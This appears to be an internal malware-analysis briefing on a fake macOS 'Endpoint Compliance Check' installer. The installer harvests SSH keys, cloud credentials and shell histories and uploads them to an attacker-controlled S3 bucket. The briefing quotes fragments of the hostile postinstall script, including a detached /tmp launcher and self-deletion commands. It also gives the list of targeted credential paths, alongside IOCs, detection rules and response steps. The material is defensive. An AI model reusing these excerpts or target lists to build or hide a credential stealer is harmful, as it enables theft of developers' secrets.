Malware Analysis Briefing · Confidential

"Endpoint Compliance Check"

A signed-looking macOS .pkg posing as a corporate security tool — in reality, a credential harvester that exfiltrates secrets from every user account on the host.

Executive Summary

Critical

What it is

A macOS installer package (ecc-darwin-arm64.pkg, ~167 MB) presented as an "Endpoint Compliance Check." It bundles legitimate open-source secret-scanning tools and weaponizes them against the host.

What it does

On install, it walks every user's home directory looking for SSH keys, cloud credentials, browser-saved logins, shell history, and tokens, then ships the encrypted findings to an attacker-controlled S3 bucket and self-destructs.

Why it matters

One successful install yields the keys to a developer's entire cloud / SaaS / source-control footprint.
The attack lives off legitimate, code-signed binaries (TruffleHog, Gitleaks) — minimal AV signal.
Self-cleanup makes post-incident triage difficult; victims may not know they were hit.
Distribution pattern matches the active "fake recruiter / take-home assignment" campaigns targeting engineers.

Action: Treat any host that ran this package as fully compromised. Rotate all developer credentials.

The Lure

Social Engineering

Presentation

Filename suggests an Apple Silicon build of a corporate compliance utility.
Bundle identifier com.endpointcompliancecheck.ecc — plausible-sounding namespace.
Standard macOS Installer flow — user is prompted for an admin password to install.
Install path /Library/EndpointComplianceCheck/ecc mimics legitimate enterprise agents.

Likely delivery vector

Pattern matches the "fake interview / take-home assignment" social-engineering campaigns: a "recruiter" or "hiring manager" asks the target to install a tool to complete an exercise.

PackageInfo (excerpt)

<pkg-info
  identifier="com.endpointcompliancecheck.ecc"
  version="1.0.0"
  install-location="/Library/EndpointComplianceCheck/ecc"
  auth="root">
  <payload numberOfFiles="8966"
           installKBytes="471717"/>
  <scripts>
    <postinstall file="./postinstall"
                 timeout="600"/>
  </scripts>
</pkg-info>

Note: auth="root" escalates the postinstall to full system privilege.

Attack Chain

5 Stages

01

Lure

Target receives .pkg via "recruiter" / Slack DM / email.

02

Install (root)

User authorizes; payload deploys to /Library/EndpointComplianceCheck/ecc.

03

Detach

Postinstall writes a launcher to /tmp and forks it disowned from the installer.

04

Harvest

Iterates /Users/*, runs TruffleHog & Gitleaks plus custom scanners across each home directory.

05

Exfil + Wipe

Encrypts results, uploads to S3, deletes install dir, pkgutil --forgets itself, removes log.

Detachment trick

# Excerpt: postinstall
cat > /tmp/.ecc_launch.sh << 'INNEREOF'
   ... harvest + upload + self-delete ...
INNEREOF
chmod +x /tmp/.ecc_launch.sh
/tmp/.ecc_launch.sh </dev/null >/dev/null 2>&1 &
disown
exit 0   # installer reports success; real work begins after

Effect: the Installer.app shows "installation successful" within seconds. The actual scan + exfiltration runs as a detached root process the user never sees.

Targeted Data

Per-user, full home directory

The bundled scan_config.yaml enumerates targets explicitly. Categories below are condensed from the live config.

Cloud & Infra

~/.aws/credentials, config
~/.config/gcloud/*
~/.azure/accessTokens.json
~/.kube/config
~/.docker/config.json
~/.terraform.d/credentials.tfrc.json
~/.vault-token

SSH & Source Control

~/.ssh/id_rsa, id_ed25519, id_ecdsa, id_dsa
~/.ssh/config, known_hosts
~/.gitconfig, ~/.git-credentials
~/.config/gh/hosts.yml
~/.netrc, ~/.npmrc, ~/.pypirc

Histories & Shell

~/.zsh_history, ~/.bash_history
~/.python_history, ~/.node_repl_history
~/.mysql_history, ~/.psql_history
~/.bashrc, ~/.zshrc (inline tokens)

Generic file scan

Recursive walk of ~ with TruffleHog + Gitleaks
Catches .env, IDE configs, repo history
Max file size: 100 MB

Identity inventory

Browser saved-login metadata (Chrome / Firefox)
macOS Keychain service + account names
Installed SaaS apps from ~/Library/Application Support
Git author identity

OCR sweep

Images in ~/Desktop, ~/Documents, ~/Downloads, ~/Pictures
OCR'd to surface tokens visible in screenshots

Exfiltration Channel

Hardcoded AWS Credentials

From scan_config.yaml

s3_upload:
  enabled: true
  bucket: "axs-ecc"
  prefix: "ecc"
  region: "us-west-1"
  access_key_id: "AKI...X6G"
  secret_access_key: "dLvcr...hmvb"
  tags:
    managed_by: "ecc"

Encryption layer

Findings are encrypted with a bundled RSA public key before upload. Only the holder of the private key (the operator) can read them.

Why this is the smoking gun

No legitimate enterprise tool ships long-lived IAM access keys in cleartext config.
The bucket name and key are operator-controlled — uploads land directly in attacker storage.
RSA wrapping protects the operator from incidental access (e.g., AWS abuse review) while the data is in transit / at rest.

Self-cleanup

# Final lines of the launcher
rm -rf "${ECC_DIR%/*}"
pkgutil --forget "com.endpointcompliancecheck.ecc"
rm -f /tmp/.ecc_launch.sh
rm -f "${LOG}"

No on-disk artifact remains. Forensic recovery is non-trivial.

Indicators of Compromise

Distribute to Detection & Response

Filesystem

Install root: /Library/EndpointComplianceCheck/ecc
Launcher: /tmp/.ecc_launch.sh
Runner: /tmp/.ecc_runner.sh
Output dirs: /tmp/.ecc_output_*
Module 1 staging: /tmp/ecc_m1_*
Log: /var/log/ecc-postinstall.log

Package metadata

Bundle ID: com.endpointcompliancecheck.ecc
Version: 1.0.0
Filename pattern: ecc-darwin-arm64*.pkg
File count: 8,966
Install size: ~471 MB

Network & cloud

S3 bucket: axs-ecc
Region: us-west-1
Object prefix: ecc/
Object tag: managed_by=ecc
AWS access key: AKI...X6G

Behavioral signals

Postinstall script spawning a detached process under /tmp
Mass reads of ~/.ssh/id_*, ~/.aws/*, browser profile dirs from a non-user process
Unsigned or third-party-signed binaries named trufflehog or gitleaks executed as root
Outbound HTTPS to *.s3.us-west-1.amazonaws.com from a process not associated with a known SaaS app

Recommended Response

If installed: assume full compromise

For confirmed-affected hosts

Isolate the host from the network immediately.
Capture /var/log/ecc-postinstall.log and any /tmp/.ecc_* remnants before they're wiped.
Reimage. Do not attempt in-place cleanup — assume any persistence mechanism on disk.
Rotate every credential that lived on the box: SSH keys, all cloud IAM, GitHub / GitLab / Bitbucket PATs, npm/PyPI tokens, Slack / Notion / Jira tokens, browser-saved passwords, 1Password / keychain items.
Audit access logs for those credentials going back to the suspected install date.
For each affected developer's git repos: review commits and CI/CD secrets for tampering.

External actions

Report the AWS access key + bucket to aws-abuse@amazon.com with the .pkg as evidence; AWS can disable the keys and preserve bucket contents for law enforcement.
File an IC3 complaint (or local equivalent) if the target was social-engineered.
Submit the .pkg to VirusTotal and to product-security@apple.com for XProtect / Notarization revocation.
If delivered via a "recruiter" account, report the account to the hosting platform (LinkedIn, GitHub, job board).

Do not use the leaked AWS keys to inspect the bucket directly — unauthorized access (CFAA) and may tip off the operator.

Preventive Controls

Reduce blast radius going forward

Endpoint policy

Block install of unsigned / non-Notarized .pkg files via MDM (Gatekeeper policy + spctl).
Restrict admin rights on developer endpoints; require JIT elevation for installer authorization.
EDR rule: alert on postinstall scripts that write to /tmp and detach from the installer.
EDR rule: alert on processes reading multiple sensitive credential paths in rapid succession.

Developer hygiene

Move long-lived SSH keys to FIDO2 / hardware-backed (Secretive, YubiKey).
Replace static cloud keys with short-lived SSO sessions (AWS SSO / IAM Identity Center, gcloud auth, az login).
Push secrets out of dotfiles and into a managed vault (1Password, op CLI, Vault).

Detection coverage

Add the IOCs from slide 7 to the SIEM watchlist and EDR custom rules.
Enable CloudTrail data events on developer S3 buckets and AWS GuardDuty for anomalous IAM use.
Enable GitHub IP allowlisting / device verification for engineering org members.
Subscribe credential-leak feeds (GitGuardian, Have I Been Pwned, internal canary tokens).

Awareness

Brief engineering on the active "fake recruiter / take-home" malware pattern.
Establish a no-questions-asked reporting channel for suspicious recruiter outreach.
Plant canary tokens in standard developer paths (~/.aws/credentials with monitored keys) to detect future variants.

Asks of Leadership

Decisions Required

Immediate (this week)

Authorize an organization-wide notice describing the lure pattern and how to report.
Approve emergency credential rotation budget for any confirmed-affected developers (estimated 2-4 hours per person).
Greenlight EDR rule rollout for the behavioral signatures listed.

Strategic (this quarter)

Fund the move from static developer credentials to SSO + hardware-key-backed identity.
Mandate MDM-enforced Gatekeeper policy on all engineering endpoints.
Stand up a canary-token program for high-value credential paths.

Bottom line

The package is technically simple but operationally well-designed: it uses legitimate tools, runs once, exfiltrates everything of value, and erases itself. The defensive answer is not better signature detection — it is reducing the value of what a developer endpoint can leak in the first place.

End of Briefing

Questions & Discussion

Full IOC list, extracted package contents, and analysis notes available on request.